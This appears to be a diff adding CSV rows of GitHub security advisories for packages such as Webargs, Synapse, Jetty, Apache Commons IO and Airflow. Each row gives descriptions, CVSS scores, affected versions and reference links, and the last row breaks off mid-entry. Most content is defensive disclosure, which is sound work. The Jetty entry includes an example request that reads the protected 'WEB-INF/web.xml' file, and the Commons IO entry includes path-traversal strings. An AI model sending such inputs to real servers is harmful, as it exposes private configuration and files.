+1.4.0,GHSA-fjq3-5pxw-4wj4,2023-09-07T15:55:33Z,2021-04-07T21:06:30Z,,['CVE-2020-7965'],Cross-Site Request Forgery in Webargs,"flaskparser.py in Webargs 5.x through 5.5.2 doesn't check that the Content-Type header is application/json when receiving JSON input. If the request body is valid JSON, it will accept it even if the content type is application/x-www-form-urlencoded. This allows for JSON POST requests to be made across domains, leading to CSRF.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'webargs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.5.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'webargs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0.b1'}, {'fixed': '6.0.0b4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7965'}, {'type': 'WEB', 'url': 'https://github.com/marshmallow-code/webargs/commit/b9ee8b0aa668207a363d9fd21d967eeadb975c3e'}, {'type': 'PACKAGE', 'url': 'https://github.com/marshmallow-code/webargs'}, {'type': 'WEB', 'url': 'https://webargs.readthedocs.io/en/latest/changelog.html#b4-2020-01-28'}, {'type': 'WEB', 'url': 'https://webargs.readthedocs.io/en/latest/changelog.html#id11'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:19:18Z', 'nvd_published_at': '2020-01-29T15:15:00Z'}"
+1.4.0,GHSA-jrh7-mhhx-6h88,2021-08-31T21:07:44Z,2021-04-13T15:12:40Z,,['CVE-2021-21393'],Denial of service (via resource exhaustion) due to improper input validation on groups/communities endpoints,"### Impact
+Missing input validation of some parameters on the groups (also known as communities) endpoints could cause excessive use of disk space and memory leading to resource exhaustion. Additionally clients may have issues rendering large fields.
+
+### Patches
+This issue is fixed by #9321 and #9393.
+
+### Workarounds
+The groups feature can be disabled (by setting `enable_group_creation` to `False`) to mitigate this issue. Note that it is disabled by default.
+
+### Other information
+Note that the groups feature is not part of the [Matrix specification](https://matrix.org/docs/spec/) and the chosen maximum lengths are arbitrary. Not all clients might abide by them.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.28.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-jrh7-mhhx-6h88'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21393'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9321'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9393'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-synapse/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T20:48:55Z', 'nvd_published_at': '2021-04-12T22:15:00Z'}"
+1.4.0,GHSA-c6p9-24rc-jr5h,2021-04-21T19:02:43Z,2021-04-22T16:15:15Z,,['CVE-2020-7744'],Remote Code Execution and download tracking in Mintegral SDK,"""This affects all versions of package com.mintegral.msdk:alphab. The Android SDK distributed by the company contains malicious functionality in this module that tracks: 1. Downloads from Google urls either within Google apps or via browser including file downloads, e-mail attachments and Google Docs links. 2. All apk downloads, either organic or not. Mintegral listens to download events in Android's download manager and detects if the downloaded file's url contains: a. google.com or comes from a Google app (the com.android.vending package) b. Ends with .apk for apk downloads In both cases, the module sends the captured data back to Mintegral's servers. Note that the malicious functionality keeps running even if the app is currently not in focus (running in the background).""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.mintegral.msdk:alphab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '14.6.01'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7744'}, {'type': 'WEB', 'url': 'https://snyk.io/blog/remote-code-execution-rce-sourmint/'}, {'type': 'WEB', 'url': 'https://snyk.io/research/sour-mint-malicious-sdk/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-COMMINTEGRALMSDK-1018714'}]","{'cwe_ids': ['CWE-319'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T19:02:43Z', 'nvd_published_at': '2020-10-15T13:15:00Z'}"
+1.4.0,GHSA-ffw3-6mp6-jmvj,2023-08-30T22:07:40Z,2021-04-07T21:05:57Z,,['CVE-2021-26559'],Improper Access Control in Apache Airflow,Improper Access Control on Configurations Endpoint for the Stable API of Apache Airflow allows users with Viewer or User role to get Airflow Configurations including sensitive information even when `[webserver] expose_config` is set to `False` in `airflow.cfg`. This allowed a privilege escalation attack. This issue affects Apache Airflow 2.0.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.1'}]}], 'versions': ['2.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26559'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/blob/486b76438c0679682cf98cb88ed39c4b161cbcc8/CHANGELOG.txt'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3b3787700279ec361308cbefb7c2cce2acb26891a12ce864e4a13c8d%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd142565996d7ee847b9c14b8a9921dcf80bc6bc160e3d9dca6dfc2f8@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/02/17/1'}]","{'cwe_ids': ['CWE-269', 'CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-01T23:27:01Z', 'nvd_published_at': '2021-02-17T15:15:00Z'}"
+1.4.0,GHSA-rjww-2x8v-m9v9,2022-09-21T19:31:15Z,2021-04-19T14:52:14Z,,['CVE-2020-36319'],Potential sensitive data exposure in applications using Vaadin 15,"Insecure configuration of default `ObjectMapper` in `com.vaadin:flow-server` versions 3.0.0 through 3.0.5 (Vaadin 15.0.0 through 15.0.4) may expose sensitive data if the application also uses e.g. `@RestController`
+
+- https://vaadin.com/security/cve-2020-36319","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-rjww-2x8v-m9v9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36319'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/8016'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/8051'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2020-36319'}]","{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:16:31Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}"
+1.4.0,GHSA-v7ff-8wcx-gmc5,2022-04-17T16:45:25Z,2021-04-06T17:31:01Z,,['CVE-2021-28164'],Authorization Before Parsing and Canonicalization in jetty,"Release 9.4.37 introduced a more precise implementation of [RFC3986](https://tools.ietf.org/html/rfc3986#section-3.3) with regards to URI decoding, together with some new compliance modes to optionally allow support of some URI that may have ambiguous interpretation within the Servlet specified API methods behaviours. The default mode allowed % encoded . characters to be excluded for URI normalisation, which is correct by the RFC, but is not assumed by common Servlet implementations. The default compliance mode allows requests with URIs that contain `%2e` or `%2e%2e` segments to access protected resources within the `WEB-INF` directory. For example a request to `/context/%2e/WEB-INF/web.xml` can retrieve the `web.xml` file. This can reveal sensitive information regarding the implementation of a web application. Workarounds found by HttpCompliance mode RFC7230_NO_AMBIGUOUS_URIS can be enabled by updating `start.d/http.ini` to include: jetty.http.compliance=RFC7230_NO_AMBIGUOUS_URIS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.37'}, {'fixed': '9.4.39'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28164'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html'}]","{'cwe_ids': ['CWE-200', 'CWE-551', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T20:28:10Z', 'nvd_published_at': '2021-04-01T15:15:00Z'}"
+1.4.0,GHSA-cccf-7xw3-p2vr,2022-02-11T21:12:25Z,2021-04-30T17:28:33Z,,['CVE-2020-10719'],HTTP Request Smuggling in Undertow,"A flaw was found in Undertow in versions before 2.1.1.Final, regarding the processing of invalid HTTP requests with large chunk sizes. This flaw allows an attacker to take advantage of HTTP request smuggling.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.1.0.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10719'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10719'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0014/'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T16:37:37Z', 'nvd_published_at': '2020-05-26T16:15:00Z'}"
+1.4.0,GHSA-xwg3-qrcg-w9x6,2021-04-23T17:17:16Z,2021-04-19T14:51:25Z,,['CVE-2021-31404'],"Timing side channel vulnerability in UIDL request handler in Vaadin 10, 11-14, and 15-18","Non-constant-time comparison of CSRF tokens in UIDL request handler in `com.vaadin:flow-server` versions 1.0.0 through 1.0.13 (Vaadin 10.0.0 through 10.0.16), 1.1.0 prior to 2.0.0 (Vaadin 11 through 13), 2.0.0 through 2.4.6 (Vaadin 14.0.0 through 14.4.6), 3.0.0 prior to 5.0.0 (Vaadin 15 prior to 18), and 5.0.0 through 5.0.2 (Vaadin 18.0.0 through 18.0.5) allows attacker to guess a security token via timing attack.
+
+- https://vaadin.com/security/cve-2021-31404","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '2.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '5.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-xwg3-qrcg-w9x6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31404'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/9875'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31404'}]","{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:16:19Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}"
+1.4.0,GHSA-35q2-47q7-3pc3,2022-08-11T00:21:37Z,2021-04-27T15:56:03Z,,['CVE-2021-29469'],Node-Redis potential exponential regex in monitor mode,"### Impact
+When a client is in monitoring mode, the regex begin used to detected monitor messages could cause exponential backtracking on some strings. This issue could lead to a denial of service.
+
+### Patches
+The problem was fixed in commit [`2d11b6d`](https://github.com/NodeRedis/node-redis/commit/2d11b6dc9b9774464a91fb4b448bad8bf699629e) and was released in version `3.1.1`.
+
+### References
+#1569 (GHSL-2021-026)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'redis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '3.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NodeRedis/node-redis/security/advisories/GHSA-35q2-47q7-3pc3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29469'}, {'type': 'WEB', 'url': 'https://github.com/NodeRedis/node-redis/commit/2d11b6dc9b9774464a91fb4b448bad8bf699629e'}, {'type': 'WEB', 'url': 'https://github.com/NodeRedis/node-redis/releases/tag/v3.1.1'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0010/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-23T18:11:39Z', 'nvd_published_at': '2021-04-23T18:15:00Z'}"
+1.4.0,GHSA-gwrp-pvrq-jmwv,2022-02-08T21:31:42Z,2021-04-26T16:04:00Z,,['CVE-2021-29425'],Path Traversal and Improper Input Validation in Apache Commons IO,"In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like ""//../foo"", or ""\\..\foo"", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus ""limited"" path traversal), if the calling code would use the result to construct a path value.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'commons-io:commons-io'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29425'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/IO-556'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r01b4a1fcdf3311c936ce33d75a9398b6c255f00c1a2f312ac21effe1@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0bfa8f7921abdfae788b1f076a12f73a92c93cc0a6e1083bce0027c5@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0d73e2071d1f1afe1a15da14c5b6feb2cf17e3871168d5a3c8451436@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1c2f4683c35696cf6f863e3c107e37ec41305b1930dd40c17260de71@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r20416f39ca7f7344e7d76fe4d7063bb1d91ad106926626e7e83fb346@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2345b49dbffa8a5c3c589c082fe39228a2c1d14f11b96c523da701db@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r27b1eedda37468256c4bb768fde1e8b79b37ec975cbbfd0d65a7ac34@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2bc986a070457daca457a54fe71ee09d2584c24dc262336ca32b6a19@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2df50af2641d38f432ef025cd2ba5858215cc0cf3fc10396a674ad2e@%3Cpluto-scm.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r345330b7858304938b7b8029d02537a116d75265a598c98fa333504a@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4050f9f6b42ebfa47a98cbdee4aabed4bb5fb8093db7dbb88faceba2@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r462db908acc1e37c455e11b1a25992b81efd18e641e7e0ceb1b6e046@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r477c285126ada5c3b47946bb702cb222ac4e7fd3100c8549bdd6d3b2@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r47ab6f68cbba8e730f42c4ea752f3a44eb95fb09064070f2476bb401@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5149f78be265be69d34eacb4e4b0fc7c9c697bcdfa91a1c1658d717b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r523a6ffad58f71c4f3761e3cee72df878e48cdc89ebdce933be1475c@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r808be7d93b17a7055c1981a8453ae5f0d0fce5855407793c5d0ffffa@%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8569a41d565ca880a4dee0e645dad1cd17ab4a92e68055ad9ebb7375@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r86528f4b7d222aed7891e7ac03d69a0db2a2dfa17b86ac3470d7f374@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r873d5ddafc0a68fd999725e559776dc4971d1ab39c0f5cc81bd9bc04@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8bfc7235e6b39d90e6f446325a5a44c3e9e50da18860fdabcee23e29@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8efcbabde973ea72f5e0933adc48ef1425db5cde850bf641b3993f31@%3Cdev.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r92ea904f4bae190b03bd42a4355ce3c2fbe8f36ab673e03f6ca3f9fa@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra8ef65aedc086d2d3d21492b4c08ae0eb8a3a42cc52e29ba1bc009d8@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raa053846cae9d497606027816ae87b4e002b2e0eb66cb0dee710e1f5@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad4ae544747df32ccd58fff5a86cd556640396aeb161aa71dd3d192a@%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbebd3e19651baa7a4a5503a9901c95989df9d40602c8e35cb05d3eb5@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc10fa20ef4d13cbf6ebe0b06b5edb95466a1424a9b7673074ed03260@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc2dd3204260e9227a67253ef68b6f1599446005bfa0e1ddce4573a80@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc359823b5500e9a9a2572678ddb8e01d3505a7ffcadfa8d13b8780ab%40%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc5f3df5316c5237b78a3dff5ab95b311ad08e61d418cd992ca7e34ae@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc65f9bc679feffe4589ea0981ee98bc0af9139470f077a91580eeee0@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca71a10ca533eb9bfac2d590533f02e6fb9064d3b6aa3ec90fdc4f51@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd09d4ab3e32e4b3a480e2ff6ff118712981ca82e817f28f2a85652a6@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re41e9967bee064e7369411c28f0f5b2ad28b8334907c9c6208017279@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/red3aea910403d8620c73e1c7b9c9b145798d0469eb3298a7be7891af@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfa2f08b7c0caf80ca9f4a18bd875918fdd4e894e2ea47942a4589b9c@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfcd2c649c205f12b72dde044f905903460669a220a2eb7e12652d19d@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfd01af05babc95b8949e6d8ea78d9834699e1b06981040dde419a330@%3Cdev.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/08/msg00016.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-20', 'CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-26T15:21:31Z', 'nvd_published_at': '2021-04-13T07:15:00Z'}"
+1.4.0,GHSA-52qp-jpq7-6c54,2021-04-27T20:54:56Z,2021-04-29T21:52:30Z,,['CVE-2021-29476'],Insecure Deserialization of untrusted data in rmccue/requests,"### Impact
+Unserialization of untrusted data.
+
+### Patches
+The issue has been patched and users of `Requests` 1.6.0, 1.6.1 and 1.7.0 should update to version 1.8.0.
+
+### References
+Publications about the vulnerability:
+* https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress
+* https://github.com/ambionics/phpggc/issues/52
+* https://blog.detectify.com/2019/07/23/improving-wordpress-plugin-security/
+* https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf
+* https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf
+* https://2018.zeronights.ru/wp-content/uploads/materials/9%20ZN2018%20WV%20-%20PHP%20unserialize.pdf
+* https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066#3c0f
+
+Originally fixed in WordPress 5.5.2:
+* https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3
+* https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
+
+Related Security Advisories:
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-28032
+* https://nvd.nist.gov/vuln/detail/CVE-2020-28032
+
+Notification to the Requests repo including a fix in:
+* https://github.com/rmccue/Requests/pull/421 and
+* https://github.com/rmccue/Requests/pull/422
+
+### For more information
+If you have any questions or comments about this advisory:
